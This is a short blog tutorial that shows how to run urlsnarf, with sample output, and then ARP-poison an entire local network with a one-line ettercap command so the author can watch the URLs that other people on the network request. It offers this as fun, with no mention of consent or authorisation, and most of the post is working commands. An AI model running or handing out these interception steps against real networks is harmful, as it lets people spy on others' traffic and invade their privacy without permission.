Categories
How-To Technical

ettercap and urlsnarf fun

Playing around I downloaded the package dsniff (apt-get install dsniff) to get a bunch of tools. One of the tools are urlsnarf which outputs all requested URLs sniffed from HTTP traffic in CLF (Common Log Format) CLF is used by almost all web servers

You start this by typing the following:

urlsnarf -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]

As traffic starts to come in using those ports commonly used by HTTP traffic you see something such as this:

 – [18/Oct/2012:00:27:13 -0400] “GET http://www.jermsmit.com/?paged=2 HTTP/1.1” – – “http://www.jermsmit.com/” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4”

But now I want to see what others are doing on my network. This will be accomplished with the help of ettercap. If you do not have it, apt-get install ettercap to download and install.

We are going to keep out urlsnarf running and what we are going to do is run the following command:

ettercap -T -Q -M arp -i eth0 // //

This scan the entire network and allows you to listen in on requests by ARP poisoning… You will see similar information as I shown you above.

Now that is a lot of info; So we are going to trim this down to make it a bit easier to reach and this is done by using the cut command with the urlsnarf to clean things up a bit. This is done by doing the following:

urlsnarf -i eth0 |cut -d” -f4

And what you get is nice and clear info such as http://www.mtv.com/

So to sum up my steps:

  • urlsnarf -i eth0 (or: urlsnarf -i eth0 |cut -d” -f4)
  • ettercap -T -Q -M arp -i eth0 // //

And that is about it. Have fun!